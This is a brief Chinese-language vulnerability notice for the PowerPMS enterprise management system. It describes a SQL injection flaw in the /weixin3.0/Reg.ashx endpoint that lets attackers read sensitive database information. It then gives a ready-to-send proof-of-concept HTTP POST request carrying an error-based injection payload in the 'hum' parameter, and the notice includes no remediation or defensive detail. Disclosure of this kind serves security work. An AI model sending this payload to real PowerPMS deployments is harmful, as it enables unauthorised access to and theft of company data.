漏洞描述
PowerPMS 是一款综合性的企业管理系统,它集成了财务管理、销售管理、采购管理、仓储管理以及项目管理等多个功能模块。该系统采用模块化设计,可以根据企业的具体需求进行灵活的配置和二次开发。其接口/weixin3.0/Reg.ashx存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
普华PowerPMS /weixin3.0/Reg.ashx SQL 注入漏洞
PoC代码
POST /weixin3.0/Reg.ashx HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
hum=1'and 1<@@VERSION--